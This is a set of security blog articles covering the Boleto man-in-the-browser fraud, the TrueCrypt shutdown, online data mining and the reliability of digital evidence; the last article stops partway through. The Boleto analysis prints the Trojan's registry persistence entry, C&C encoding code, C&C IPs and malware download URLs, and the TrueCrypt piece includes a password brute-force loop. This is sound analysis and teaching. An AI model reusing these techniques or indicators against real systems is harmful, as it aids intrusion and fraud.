Boleto fraud: You don’t need a fast car to rob a bank anymore

Introduction

The number of physical robberies on banks has slipped to almost zero, but the amount of money that banks are losing through electronic methods has rocketed. With physical security it is easy to put up CCTV cameras and bullet-proof glass, and to install alarms, but in an electronic world there are infinite ways to commit fraud. There are also many targets in an electronic world, and criminals can focus their efforts on the customer, the bank, or the merchant. With virtually no effort at all, criminal gangs can install malware within any part of the e-Commerce infrastructure, and either steal user credentials or modify transactions. While we might call it a victimless crime, we would be wrong, as large-scale fraud can have serious implications for the global financial market, and also for user trust.

In fact, from the early days of the Internet, individuals have been finding ways round the processes in place (Figure 1). These include John Draper (or Captain Crunch), who used a toy whistle given away free in cereal packs, tuned to 2,600Hz, to place free long-distance calls, and Vladimir Levin, from Russia, who siphoned off millions from Citibank. As we will find, these days any script kiddie can create their own targeted attack on users, and it does not need extensive programming skills, or even a deep knowledge of how the e-Commerce infrastructure works. A key target, though, is the end user, as they tend to be the weakest link in the chain.

The latest targeted malware, most probably set up by Brazilian organized crime gangs, has hijacked boleto transactions in Brazil across a vast number of low-value transactions. It works by tricking users into installing a piece of malware on their system, which waits until the user visits their bank’s Web site. On detecting this, the malware fills out the account information required for the recipient of a boleto transaction, then submits the transfer for payment, modifying it so that the intended recipient’s account is substituted with the attacker’s one.

Figure 1: Well-known hackers

What happened with Boleto?

In July 2014, RSA announced a large-scale fraud against Boleto Bancário (or Boleto, as it is simply known), which should serve as a wake-up call for the finance industry, and for governments around the world. It could, in fact, be the largest electronic theft in history ($3.75bn). Overall, nearly 200,000 IP addresses were associated with infected machines. A boleto is similar to an invoice issued by a bank so that a customer (“sacado”) can pay an exact amount to a merchant (“cedente”). These can be generated in an off-line manner (with a printed copy) or on-line (such as in on-line transactions).

Boleto is one of Brazil’s most popular payment methods, and just last week it was discovered to have been targeted, for over two years, by malware. There are no firm figures on the extent of the compromise, but up to 495,753 Boleto transactions were affected, with a possible hit of $3.75bn (£2.18bn).

Boleto is the second most popular payment method in Brazil, after credit cards, and accounts for around 18% of all purchases. It can be used to pay a merchant an exact amount, typically for phone and shopping bills. There are many reasons that Boleto is popular in Brazil, including the fact that many Brazilian citizens do not have a credit card, and, even when they do have one, credit cards are often not trusted. Along with this, the transaction typically has a fixed cost of 2 to 4 US dollars, as opposed to credit card rates, which are a percentage of the transaction (in Brazil, typically between 4 and 7.5%).

The operation infected PCs using standard spear phishing methods, managing to infect nearly 200,000 PCs and to steal over 83,000 sets of user email credentials. It used a man-in-the-browser attack, where the malware sits inside the browser (including Google’s Chrome, Mozilla’s Firefox and Microsoft’s Internet Explorer) and intercepts Boleto transactions. The impact was so great because Boleto is only used in Brazil, so malware detection software had not targeted it, as it is a limited market.

The Web-based control panel [2] for the operation shows that fraudsters had stolen $250,000 from 383 hijacked boleto transactions between February 2014 and the end of June 2014 (Figure 2). Of the statistics received, all the infected machines were running Microsoft Windows, with the majority running Microsoft Windows 7 (78.3%) and Microsoft Windows XP second (17.2%). Of the browsers detected, the most popular was Internet Explorer (48.7%), followed by Chrome (34%) and Firefox (17.3%), and the most popular email domain among the stolen user credentials was hotmail.com (94%).

Figure 2: Control panel showing fraud

Was Boleto secure?

While it was seen as generally secure, it had been identified as being open to a ‘check-bounce’ scenario, where a payment looks as if it has gone through, and the goods are received, but the transaction eventually bounces (similar to a check bouncing). In a typical transaction the bank notifies the CyberSource Latin American Processing service that a boleto has been paid, indicating a payment status of either paid or not paid. In the case of a bounced check, the status will be set to non-payment. There can thus be fraud when the goods are received before the payment has cleared. When the payment status is set to ‘paid’, the transaction is reported to the Payment Events Report. Unfortunately there are no charge-backs on Boleto transactions, and the transaction is paid by cash, check, or an online bank transfer. There is some protection, though, in using Boleto, as consumers are allowed seven days to ‘regret’ the payment and ask for a refund. With Visa, there is payment protection for the consumer, which does not exist with Boleto.

So who was the man-in-the-browser?

Figure 3 shows an outline of the taxonomy of malware. It shows that malware has a:

  • Distribution method. In the case of the Boleto fraud this was through spear phishing emails.
  • System compromise. After distribution, the malware then compromises the system and installs itself in a persistent way. In this case it placed a program on the disk, and then added an entry into the Windows registry so that the program loaded every time the computer was booted.
  • Trigger event. After the compromise, the malware is then triggered by an event. In this case, by the user accessing their Live/Hotmail email account or making a transaction using Boleto.

In the case of the Boleto fraud, the man-in-the-browser was Eupuds (classified as an information-stealing, man-in-the-browser (MITB) Trojan), which infects web browsers on Windows-based PCs, including Internet Explorer, Firefox and Chrome, and also steals account information for live.com, hotmail.com and facebook.com.

Eupuds manages to stay alive by creating a program on the disk at (where c:\users\fred is the home directory):

c:\users\fred\Application Data\[RANDOM CHARACTERS].exe

and then makes sure that it is always started when the computer is booted by modifying the Windows registry key of:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM CHARACTERS].exe" =
 "c:\users\fred\Application Data\[RANDOM CHARACTERS].exe"

In this way the Trojan program is always started when the computer is booted. In many cases malware will hide itself so that it can get round a virus scan. In this case, the malware uses random characters for the name of the file, and a different name for the process. Along with this, the malware is a compiled AutoIt script and uses UPX packing, which makes it difficult to analyse and reverse engineer.
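To make the persistence point concrete, here is a minimal Python sketch (Windows only, using the standard winreg module) that lists the HKCU Run entries where this style of start-up entry would appear; it is an inspection aid, not the malware’s own code:

import winreg  # standard library, Windows only

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

def list_run_entries():
    """Return the (name, command) pairs registered to run at logon."""
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _type = winreg.EnumValue(key, index)
            except OSError:          # raised when no more values remain
                break
            entries.append((name, value))
            index += 1
    return entries

if __name__ == "__main__":
    for name, command in list_run_entries():
        print(f"{name} -> {command}")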

The malware works by detecting traffic between the browser and the server, and searches for specific strings:

  • Boleto.
  • pagador.com.br – this is the Brazilian online payment service.
  • segundavia – this is used when requesting a Boleto reissue.
  • 2via – this is used when requesting a Boleto reissue.
  • ?4798 – this is part of a Brazilian bank URL.
  • carrinho – this is the shopping cart of an online store.
  • live.com – this detects a login for the Microsoft Live email package.

This is a modification of the standard Eupuds malware, which also detected strings containing .gif, .png, .flv, and facebook.com. Once it is installed, it looks for the client-side security plug-ins used by banks. The shared executables that the plug-ins use are then neutralised by downloading patched versions, so that the user has no protection against the man-in-the-browser.
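To illustrate the matching logic, here is a hedged Python sketch built from the trigger strings listed above; the Trojan’s real code is not public in this form, so treat it as a model only:

# Trigger strings reported for the Boleto variant of Eupuds
TRIGGERS = ["boleto", "pagador.com.br", "segundavia", "2via",
            "?4798", "carrinho", "live.com"]

def is_of_interest(traffic: str) -> bool:
    """Return True if browser traffic contains any trigger string."""
    text = traffic.lower()
    return any(trigger in text for trigger in TRIGGERS)

print(is_of_interest("GET https://www.meubanco.com.br/2via/boleto"))  # True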

Figure 3: Taxonomy of malware

There have been many threat messages which highlight the distribution of the spam emails, such as this one from Cisco Systems in 2012:

Cisco Security Intelligence Operations has detected significant activity related to spam e-mail 
messages that claim to contain an import assistant program for the recipient. The e-mail message 
attempts to convince the recipient to open a .zip attachment to preview the data to be imported. 
However, the .zip attachment contains a malicious .cmd file that, when executed, attempts to 
infect the system with malicious code.
 
E-mail messages that are related to this threat (RuleID4218, RuleID4218KVR, and RuleID4349KVR) 
may contain any of the following files:
Fatura_Cartao.txt.zip
Fatura cartao.cmd
Fatura-Boleto.zip
Fatura-Cartao.cmd
Fatura.zip
Fatura.cmd
Fatura.exe
Boleto.zip
Boleto.cmd
The Boleto.cmd file in the Boleto.zip attachment has a file size of 368,640 bytes. The MD5 checksum is the following string: 0x21E9F84477A48C63115FE0E9A22E4DA8.

The following text is a sample of the e-mail messages associated with this threat outbreak:

Subject: Boleto@jcessoria.com.br
Message Body: Zip archive attachment (Fatura_Cartao.txt.zip)

or

Subject: Boleto de cobranca
Message Body: Demostrativo em anexo.

or

Subject: cobranca@checkok.com.br
Message Body:
Demostrativo em anexo.

As this threat warning is nearly two years old, why did it take so long to discover the objectives of the malware? Other warnings, such as those in 2013, also highlighted the threat. Along with this, the first signs of the ZIP file containing the malware appeared in 2010:

2010/10/8_12:43 fileden.com/files/2010/9/27/2980248/Boleto.zip
2010/11/3_00:52 novemstn.webcindario.com/boleto.zip
2010/11/3_05:09 ormsoigso.webcindario.com/boleto.zip

The last two point to Spanish Web hosting.

Detecting the Malware

Once the malware is installed on the machine, it communicates with the command and control (C&C) server using a basic encryption method, which encodes the messages with an exclusive-OR (XOR) operation using a key of 0xA4BBCCD4, followed by a modified Base64 encoding, with the characters ‘+’ and ‘/’ replaced by ‘-’ and ‘_’, respectively (Figure 4). The IP addresses detected for the C&C include 216.246.98.4, 216.246.91.220 and 216.246.91.221, which point to the hostforweb.com domain, a general Web hosting infrastructure.
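From that description, the C&C encoding can be sketched in a few lines of Python: a repeating 4-byte XOR, followed by URL-safe Base64 (which is exactly the ‘+’ to ‘-’ and ‘/’ to ‘_’ substitution). The real malware’s message framing and padding may well differ:

import base64
from itertools import cycle

KEY = bytes.fromhex("A4BBCCD4")   # XOR key reported by RSA [1]

def encode(message: bytes) -> bytes:
    """XOR with the repeating key, then URL-safe Base64 ('+'->'-', '/'->'_')."""
    xored = bytes(b ^ k for b, k in zip(message, cycle(KEY)))
    return base64.urlsafe_b64encode(xored)

def decode(blob: bytes) -> bytes:
    """Reverse of encode()."""
    xored = base64.urlsafe_b64decode(blob)
    return bytes(b ^ k for b, k in zip(xored, cycle(KEY)))

assert decode(encode(b"infected=1&os=win7")) == b"infected=1&os=win7"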

Figure 4: Network request (RSA Labs [1])

Conclusions

Spear phishing is the most common method of getting malware onto machines these days: users are sent emails with links in them, and when the user clicks on one, it runs a program on their computer and installs the malware. In this case it was a Trojan which intercepted the communications between the browser and the Web site, and was set up to detect Boleto payments. The malware was also able to intercept email login details. So what’s the solution? Users need to watch what they click, and also patch their systems.

What is most worrying about this type of fraud is that it could compromise the whole of the finance industry, and could even bring down major finance companies, or even nation states, with a single large-scale event. The target is slowly moving to end-users as, as long as there is one person willing to click on a link in an email, there will be the potential for fraud.

If you are interested, this presentation shows a real-life Trojan infection which uses the same methods as this fraud: for details of exploit kits go to 57m6s, and for the real-life Trojan go to 13m30s:

References

[1] RSA Research, “RSA Discovers Massive Boleto Fraud Ring in Brazil”, July 2014. https://blogs.rsa.com/wp-content/uploads/2015/07/Bolware-Fraud-Ring-RSA-Research-July-2-FINALr2.pdf

[2] B. Krebs, “Brazilian ‘Boleto’ Bandits Bilk Billions”, Krebs on Security, July 2014. http://krebsonsecurity.com/2014/07/brazilian-boleto-bandits-bilk-billions/

TrueCrypt: A Strange Mystery in a World of Secrets

Introduction

Imagine the headlines if, after a full review of the safety of its cars, BMW announced that it was releasing a new car that had safety warning messages all over it, and that it was the last car it would ever build. To add to this, it had limited the car’s performance so that it was almost unusable, and told customers to go and purchase a Mercedes-Benz instead. And, finally, that it was shutting down all its plants and burning all its designs, so that no-one could use them. Well, in the world of cryptography, this is roughly what happened with TrueCrypt.

Keeping a secret

The ability of defence agencies to read secret communications and messages gives them a massive advantage over their adversaries, and is at the core of many defence strategies. Most of the protocols used on the Internet are clear-text ones, such as HTTP, Telnet, FTP, and so on, but increasingly we are encrypting our communications (such as with HTTPS, SSH and FTPS), where an extra layer of security (SSL) is added to make it difficult for intruders to read and change our communications. While not perfect, and open to a man-in-the-middle attack, this is a vast improvement on communications where anyone who can sniff the network packets can read (and change) them. The natural step forward, though, is to encrypt the actual data before it is transmitted, and when it is stored. In this way not even a man-in-the-middle can read the communications, and the encryption key resides only with those who have rights to access the data.

While many defence mechanisms in security have been fairly easy to overcome, cryptography – the process of encrypting and decrypting using electronic keys – has been seen as one of the most difficult to overcome. It has thus been a key target for many defence organisations, with a whole range of conspiracy theories around the presence of backdoors in cryptography software, through which defence agencies have spied on their adversaries. Along with the worry of backdoors within the software, there have been several recent cases of severe bugs in secure software, which can compromise anything that has previously been kept secure. This was highlighted by Heartbleed in OpenSSL, and by the heart symbol bug in TweetDeck.

So, after the major impact of the bug found in OpenSSL which led to Heartbleed, on 28 May 2014 visitors to the TrueCrypt site found this message:

The development of TrueCrypt was ended in 5/2014 after Microsoft 
terminated support of Windows XP. Windows 8/7/Vista and later offer 
integrated support for encrypted disks and virtual disk images. 
Such integrated support is also available on other platforms 
(click here for more information). You should migrate any data 
encrypted by TrueCrypt to encrypted disks or virtual disk images 
supported on your platform.

For an open source project which supported a wide range of computer types and languages, it was a strange message to tell users to move to a closed-source, commercial solution. TrueCrypt supports most types of modern computers and is free to use, whereas BitLocker is part of Microsoft Windows and requires a licence for a version of Windows that supports disk encryption.

Some basics of encryption

Most encryption uses a secret encryption key, which is used both to encrypt and to decrypt. This is known as private-key encryption, and the most robust of these methods is AES (Advanced Encryption Standard). The key must be stored somewhere, and is typically placed in a digital certificate which is stored on the computer, and can be backed up onto a USB device. The encryption key is normally derived from a password chosen by the user.

Along with this we need to prove the identity of the user, and also that the data has not been changed. For this we use a hash signature, which allows an almost unique code to be created for a block of data. The most popular methods for this are MD5 and SHA. The hashing method used in TrueCrypt is SHA-512.
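As a generic sketch (TrueCrypt’s own key-derivation parameters differ), this shows the usual pattern with Python’s standard hashlib: a password is stretched into an encryption key, and SHA-512 gives an almost unique fingerprint of a block of data:

import hashlib, os

password = b"correct horse battery staple"   # example passphrase only
salt = os.urandom(16)                        # random salt stored alongside the volume

# Stretch the password into a 256-bit key (PBKDF2 with HMAC-SHA-512)
key = hashlib.pbkdf2_hmac("sha512", password, salt, 200_000, dklen=32)

# An almost-unique fingerprint of a block of data
digest = hashlib.sha512(b"the data to be protected").hexdigest()

print("key:", key.hex())
print("sha512:", digest)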

The Trouble Caused by Cryptography

Encryption is the ultimate nightmare for defence agencies, as it makes it almost impossible to read messages from enemies. The possibilities are either to find a weakness in the methods used (such as in OpenSSL), or in the encryption keys (such as with weak passwords), or, probably the easiest, to insert a backdoor in the software that gives defence agencies a method of reading the encrypted files.

There has been a long history of defence agencies blocking the development of high-grade cryptography. In the days before powerful computer hardware, the Clipper chip was proposed, where a company would register to use it and be given a chip to encrypt with, and where government agencies kept a copy of the key.

In 1977, Ron Rivest, Adi Shamir, and Leonard Adleman at MIT developed the RSA public key method, where one key (the public key) could be used to encrypt and only a special key (the private key) could decrypt the cipher text. Martin Gardner, in his Mathematical Games column in Scientific American, was so impressed with the method that he published an RSA challenge, for which readers could send a stamped addressed envelope for the full details of the method. The open distribution of a method which could be used outside the US worried defence agencies, and representations were made to stop the paper going outside the US, but, unfortunately for them, many copies had gone out before anything could be done about it.

Phil Zimmermann was one of the first to face up to the defence agencies with his PGP software, which, when published in 1991, allowed users to send encrypted and authenticated emails. For this the United States Customs Service opened a criminal investigation for a violation of the Arms Export Control Act, under which cryptographic software was seen as a munition. Eventually the charges were dropped.

A Brief History of TrueCrypt

TrueCrypt is an open source disk cryptography package, which has been around since February 2004 and is maintained by the TrueCrypt Foundation. It has versions for Microsoft Windows, OS X, Linux, and Android, and supports 30 languages. David Tesařík registered the TrueCrypt trademark in the US and Czech Republic, and Ondrej Tesarik registered the not-for-profit TrueCrypt company in the US. It works by creating a virtual drive on a computer; anything written to the drive is encrypted, and then decrypted when the files are read back. For encryption it uses private-key encryption with AES, Serpent, or Twofish (or combinations of these), and uses the hash functions RIPEMD-160, SHA-512, and Whirlpool. In modern systems, AES is seen as the most secure, and SHA-512 provides state-of-the-art signatures. The encrypted drive does not have a magic number which identifies the presence of TrueCrypt, but forensic analysis can reveal a TrueCrypt boot loader, after which a hacker might try different passwords to unlock the drive.

So what happened?

An audit of the Version 7.1a code was under way when, on 28 May 2014, it was announced that TrueCrypt was discontinued, along with the release of version 7.2 (which was intentionally crippled and contained lots of warnings in the code). The updated licence (TrueCrypt License v3.1) removed specific language that required attribution of TrueCrypt. Never in the history of software had there been such an abrupt end, with the developers not even wanting a fork of their code. An email from a TrueCrypt developer (on 16 June 2014) outlined that they did not want to change the license to an open source one, and that the code should not be forked.

Backdoor?

Some reckon that there was an ongoing code audit, that an NSA-created backdoor was due to be found, and that a smoke-screen was then put up to move users towards a closed-source alternative which, some also reckon, has an NSA-enabled backdoor. Few security professionals, especially those involved in the creation of encryption software, would have recommended the Microsoft technology.

The mystery remains about the code, but there are some strange pointers that give some clues. A strange one is that, within the code, “U.S.” has been changed to “United States”, which could point to an automated search-and-replace on the code, reflecting a possible change of ownership.

The other strange thing about the post is that the page created for the re-direct looks as if it was created by a complete amateur:

and even the Wayback engine was having trouble finding the pages from the past:

So was it a back door, or could it have been a bug, in the same way that OpenSSL was exposed?

Code bug?

If there is a code bug, the light is likely to shine on one of the weak points in cryptography: the generation of pseudo-random numbers, which is almost impossible to do well on a computer. One way of doing it is to use the time between a user’s key strokes, but if an intruder can guess these, they can significantly reduce the range of numbers used in the cryptography process. This could have been the Achilles heel of the code: the audit process could have uncovered a flaw which others could exploit. In the case of TrueCrypt the random number was generated partly from the user moving the cursor across the screen, and it could be this method which caused the problem.
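A toy model of the idea (not TrueCrypt’s actual pool design): entropy gathering mixes unpredictable events into a hash-based pool, and if an attacker can predict those events, the seed space collapses:

import hashlib

class EntropyPool:
    """Toy entropy pool: mix events in, hash the pool to draw a seed."""
    def __init__(self):
        self._pool = hashlib.sha512()

    def add_mouse_event(self, x: int, y: int, t_ns: int):
        # Mix cursor position and a high-resolution timestamp into the pool
        self._pool.update(x.to_bytes(2, "big"))
        self._pool.update(y.to_bytes(2, "big"))
        self._pool.update(t_ns.to_bytes(8, "big"))

    def seed(self) -> bytes:
        return self._pool.digest()

pool = EntropyPool()
pool.add_mouse_event(512, 384, 1_403_000_123_456_789)
print(pool.seed().hex()[:32])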

Another possible problem focuses on the actual binary code produced. Even if the source code does not contain any bugs, it is converted into machine code, which could introduce problems that could be exploited. Most users will download the binary distribution, as it is often too difficult to build the code from scratch, so an exploit could have been hidden within the binary distributions. Often developers forget that their code can be run within a debugger, to view, and even edit, the code. With the code built for so many systems, it would have been almost impossible to make sure that the compiled code was secure from tampering.
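One practical mitigation hinted at here is to verify a downloaded binary against a hash published through a separate channel. A minimal sketch, where the file name and published value are hypothetical placeholders:

import hashlib

def sha256_of(path: str) -> str:
    """Hash a file in chunks so large binaries don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

PUBLISHED = "0f" * 32   # hypothetical 64-hex-digit value from the project site

if sha256_of("TrueCrypt-Setup.exe") == PUBLISHED:
    print("checksum matches the published value")
else:
    print("checksum mismatch: do not run this binary")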

Will it die?

While the licence possibly prohibits a fork of the code, new groups, working outside the US, are looking at setting up the code to overcome the licensing issues. One such group, based in Switzerland (TrueCrypt.ch), aims to fully investigate the code and to build on previous versions of it. The message on the site is:

TrueCrypt
must not die

TrueCrypt.ch is the gathering place for all up-to-date 
information.  If TrueCrypt.org really is dead, we 
will try to organize a future.

The Problems with Disk Encryption

Many see the encrypting of disks as the ultimate method of security, but, unfortunately, it suffers from many problems. These include:

  • A weak password can make it fairly easy for an intruder to crack the encryption, by continually trying common passwords (see the sketch after this list).
  • The encryption key is stored in running memory, which is protected while TrueCrypt is running, but researchers have shown that a warm boot (that is, one which starts from a Ctrl-Alt-Del, rather than from a power up) can release the lock on the memory and reveal the encryption key.
  • The domain administrator has a copy of the encryption keys. Most users in companies connect to a domain, and the domain administrator normally has a copy of the encryption keys for the encrypted drive (which can normally be used to decrypt the disk if the user forgets their password). If the domain is breached, the encryption key can be stolen and used to decrypt the drive.
  • The electronic key must be stored somewhere, and this is normally on a digital certificate. This is stored on the system, and can be cracked by brute-forcing the password on the digital certificate.
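A hedged sketch of the first point: given the salt and the derived key (toy values below), an attacker simply replays the key derivation over a word list until a guess matches:

import hashlib

salt = b"example-salt"                     # toy values for illustration only
stolen = hashlib.pbkdf2_hmac("sha512", b"letmein1", salt, 1000, dklen=32)

wordlist = [b"password", b"123456", b"qwerty", b"letmein1"]
for guess in wordlist:
    derived = hashlib.pbkdf2_hmac("sha512", guess, salt, 1000, dklen=32)
    if derived == stolen:
        print("password recovered:", guess.decode())
        break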

Conclusions

This article has more questions than answers, as that is currently where we are in understanding what happened. There are still many theories around, but what could have happened, and virtually every software developer will relate to this, is that the developers found an architectural flaw which could not be fixed with a simple update, and decided to pull the plug. Otherwise, their approach seems strange, and doesn’t fit the normal practice of open source developers. It must be noted that when OpenSSL was analysed it contained a whole range of serious problems, and perhaps the developers of TrueCrypt realised that their code, written in C++ and Assembly Language, might have some serious problems which could be exploited by others, or that it already had been.

Many wonder whether the audit of the TrueCrypt code should continue, but humans are inquisitive and love the challenge of looking for flaws, so we need to keep examining our code and weed out bad practice, as so many problems have been caused by poorly written software, just as OpenSSL has shown.

What is strange is that all the previous versions have been taken off the TrueCrypt site, which seems to point to a problem with those versions, and to the developers pushing users towards the most up-to-date version (which contains lots of warnings, and code that makes it difficult to use).

In an era where the natural next step for security is to store encrypted data within public cloud infrastructures, a weakness here could end up compromising the whole of the Internet. So rather than the shock story of BMW giving up building cars, the shock story could be that all our secret files and communications were now viewable by everyone on the Internet … honestly … it could happen!

In the Information Age, we are all part of a great big experiment

Introduction

We are entering an era where data is King, and where our every move, our every emotion and our every contact can be tracked. With the increasing analysis of social media, there is very little about our lives that can be hidden from organisations wishing to push customized content to us, or to understand how we live. If an on-line company can drop a cookie onto our machine, it can sustain long-term tracking of our activities, and this now includes understanding how we react to advertising material, especially what made us click on the content; increasingly, they are learning our behavior.

The need to gain ethical permission, in the way that research teams must when they involve human participants, is slowly eroding; perhaps, in some cases, this is a natural extension of existing practices, where advertising content is focused on target groups.

One of the major changes within this Big Data era is that users often freely offer their data to the Internet, where it can be used in ways that are often unexpected to them. For example, a tweet on a local event will time-stamp where a person was at a given time, and can even reveal information about their movements, and perhaps who they had contact with.

Mining for sense and emotion

With so much on-line data, it is key for advertising agencies to understand the emotions of messages posted on-line, where studies that would once take months or even years can now be done within minutes. Like it or not, we are all part of an on-going experiment which mines our data on a continual basis, then pushes content our way, and monitors even how we use that customized content.

Since advertising began as an industry, researchers have been trying to mine large populations for their emotions, and the challenge within social media is to make sense of large numbers of comments and to mine the sentiments within them. This is fairly easy with a tweet of:

I am so happy that the sun is shining today :-)

but placing a different emoticon on it changes the sense:

I am so happy that the sun is shining today ;-)

and then is changed completely with the dreaded exclamation mark:

I am so happy that the sun is shining today!

which gives the impression that someone is very unhappy about the weather.
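A toy illustration of the problem (the weights are invented, and real sentiment miners are far more sophisticated): the same words score differently once the trailing cue is taken into account:

POSITIVE_WORDS = {"happy", "sun", "shining"}

def naive_sentiment(tweet: str) -> float:
    """Score positive words, then adjust for the trailing emoticon/punctuation."""
    base = sum(word.strip("!.,") in POSITIVE_WORDS for word in tweet.lower().split())
    if tweet.endswith(":-)"):
        return base            # smile: take the words at face value
    if tweet.endswith(";-)"):
        return base * 0.5      # wink: probably ironic
    if tweet.endswith("!"):
        return base * -1.0     # read here as exasperation
    return base

for t in ["I am so happy that the sun is shining today :-)",
          "I am so happy that the sun is shining today ;-)",
          "I am so happy that the sun is shining today!"]:
    print(naive_sentiment(t), t)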

Part of a great experiment

Facebook took emotion research one step further in January 2012, when its data scientist Adam Kramer conducted a two-week experiment on 689,003 Facebook users, in order to find out if emotions were contagious within social networks. It came to the almost obvious conclusion that users feel generally happy when they are fed good news (the economy is looking good and the weather is nice) and depressed when they get bad news (a bomb has gone off injuring many people and it looks like snow is on the way).

For users the mining of data is generally accepted, and Facebook, along with many other Internet-focused companies, especially Google and Amazon, extensively mines our data and tries to make sense of it. In this symbiotic relationship, the Internet companies give us something that we want, such as free email, or the opportunity to distribute our messages. What was strange about this experiment is that the Facebook users were being treated in the same way as rats in a laboratory, and had no idea that they were involved. On the other hand, it is not that much different from the way affiliate networks operate: they analyse the user, push content from an affiliate of the network, and then monitor the user’s response (Figure 1).

We increasingly see advertising in the Web pages we access, where the user is matched to their profile through a cookie, and where digital marketing agencies and affiliate marketing companies try to match advertising to our profile. They then monitor the success of the advertising using analytics such as:

  • Dwell time. This metric measures how engaged the user has been with the content before clicking on it.
  • Click-through. This records the click-through rate on content. An affiliate publisher will often be paid for click-throughs on advertising material. This can lead to click-through scams, where users are paid to click on advertising content on a page.
  • Purchases. This records the complete process of clicking through and the user actually purchasing something. This is the highest level of success, and can lead to higher levels of income, in some cases a percentage share of the purchase price. Again, this type of metric can lead to fraud, where a fraudster uses stolen credit card details to purchase a high-price item through a fraudulent Web site, gaining commission from the on-line purchase (which is traced as fraudulent at a later time).

Figure 1: Affiliate marketing

The key areas which are relevant to monitoring of user activities are:

  • Transaction verification. This involves protecting users by understanding their activities, especially around the types of purchases they make.
  • Brand monitoring. This involves understanding how brands are used within web pages, and how they are integrated and if key messages are picked-up.
  • Web-traffic analytics. This involves understanding how users search for pages and navigate around web sites.
  • Affiliate platforms. This tries to match users to affiliates, and integrate targeted marketing.
  • Campaign verification. This uses analytics to verify that campaigns are successful in their scope.

One of the most successful uses of targeting users and monitoring their actions is affiliate marketing, where businesses reward affiliates for each ‘customer’ brought in by the affiliate’s own marketing efforts. This is a booming market:

  • Of projected global online sales of nearly $780 billion by 2014, ~ $90bn will be driven by affiliate marketing
  • $4.62bn sales driven by affiliate marketing in the UK in 2010.

Figure 2 shows an example of targeted advertising, where a previous page involved a search for a Microsoft Surface Pro, and Ad-Choice (which is maintained by Criteo) has integrated an advert for it within another page. In this way Ad-Choice has decided that this is a good advertisement for us, and if we click through, the click will be remembered, and the host site will get some form of payment for it. If the user actually follows through and purchases the goods, the host site could gain a part of the commission.

Figure 2: Ad-Choice integration based on user activity

Conclusions

Thus we are being monitored and mined all the time, and the content which is pushed to us is focused on us. Increasingly, that content is being customized with advertising messages. At present there is generally no need for informed consent for this type of push advertising, as users generally feel that it is an acceptable level of intervention for their Web content, but they perhaps forget that there is a whole lot of matching and analyzing going on in the background.

Gaining Access to our Internet Records – Warrant or Not? Can it be trusted?

Background


Many countries are debating how digital information should be used to detect and resolve crime. On the right wing, there is a push to justify access to ISP (Internet Service Provider) information, such as the IP addresses of users downloading and distributing copyright material, while more liberal governments see this as a Big Brother society.

In countries such as Canada there is a move for information from ISPs to be handed over without a warrant. The Conservative government in Canada has pushed through Bill C-13 (Protecting Canadians from Online Crime Act), which aims to allow access to ISP records without a warrant, but warrantless access has just been ruled unconstitutional by Canada’s top court, which sees it as snooping. A major question must be how credible Internet records actually are, as many homes are allocated a single IP address, which maps to all the users of the home network. The Bill is justified by the risks around cyberbullying and copyright breaches, but could obviously be abused, and used for a range of surveillance activities. A previous Bill (C-30) was rejected due to surveillance concerns, and many think that the recent cases of cyberbullying in Canada are being used to justify C-13.

In Scotland, too, there has been a great deal of discussion on ditching corroboration for cyber crime, although it looks like this will not go ahead. One thing that should be remembered is that digital evidence is often fragile. To outline how fragile, this article presents six key scenarios which show that it is often not possible to fully prove that digital information is credible in criminal investigations. The six defence scenarios, which can easily be quoted, are:

  • It wasn’t my computer.
  • Someone accessed my machine and did it.
  • Someone stole my user account details.
  • The bot did it.
  • My computer automatically went to it.
  • I didn’t send the email.

This article does not debate the rights or wrongs of access without a warrant, but outlines cases where digital information cannot be treated as a definitive source of evidence.

Six Scenarios

Digital information is really just a bunch of 1s and 0s. It is fragile, and can often be changed while it is stored, transmitted or processed. Basically, all the information we see is converted from these 1s and 0s, and is often provided in a way which can be easily compromised. Digital evidence gathering does give investigators new ways to investigate quickly, and to corroborate traditional evidence. I’d like to outline six scenarios which show how fragile digital information is.

Crime Scenario 1 (Defence: It wasn’t my computer). In this case Bob is at home, and his ISP has detected that he has been accessing illegal content. Bob is arrested, and says that it was someone else on the network. Most home networks use NAT (Network Address Translation), which maps one or more private IP addresses (such as 192.168.0.1, 192.168.0.2, and so on) to a single public IP address. Thus all the data packets received by the ISP will have the same IP address, no matter which computer generated the request. It is thus not possible to lock in on the physical address of the computer, as the physical address cannot be determined from the data packets. So IP addresses alone cannot be taken as a single source of evidence.

In a company environment, again, the IP address alone cannot be taken as a credible single source, as it can be spoofed. In this case, Alice waits for Bob to log off, sets her computer to a static address which matches Bob’s computer, and then accesses the material, and Bob gets the blame. If we were to use the physical address as a trace, again, the physical address (normally known as the MAC address) is also easily spoofed.

Crime Scenario 2 (Defence: Someone accessed my machine and did it). In this case, Bob’s computer has illegal content on it, and he claims that he has no idea how it got there. Most computers are networked, and once they join a network they can be connected to. Often guest shares or guest accounts can be used to create a connection; if not, there is a whole range of malware kits that Eve can use to gain remote access to the machine. In this case Eve sends Bob a link to a PDF document. He views it, and it actually sets up a remote access method for Eve, and she can do whatever she wants on his machine. If Bob hasn’t patched his machine, he is vulnerable to this; in defence he just says that he doesn’t trust Microsoft’s patches, and it was their fault. If the PDF doesn’t work, she tries a Java exploit; if that doesn’t work, it’s a Flash compromise … and she keeps trying.

Crime Scenario 3 (Defence: Someone stole my user account details). Bob is arrested for trying to take money from someone else’s account and put it into an off-shore account. The bank says that he logged in and transferred the money. In fact, Eve has sent Bob a trick email which asks him to log in and check some details. He logs in, but it doesn’t work; the next time, it is fine. After this Eve has his login details, and can go ahead and log in on his behalf. Bob has no idea that anything went wrong, but the first site was a spoof site which captured the login details for his bank, and then redirected to the main site, where the login worked. To make the spoof site look real, Eve has scraped the images, text and style sheets from the bank site, so it all looks real.

Crime Scenario 4 (Defence: The bot did it). In this case, Bob has been attacking a remote site, and is arrested. His defence is that it wasn’t him: it was a bot on his machine. In most cases this defence is not strong, but there is always a chance that a bot on the computer did generate the malicious activity. Just because no malware is found on a machine at the point of investigation doesn’t mean that it wasn’t there at some time in the past.

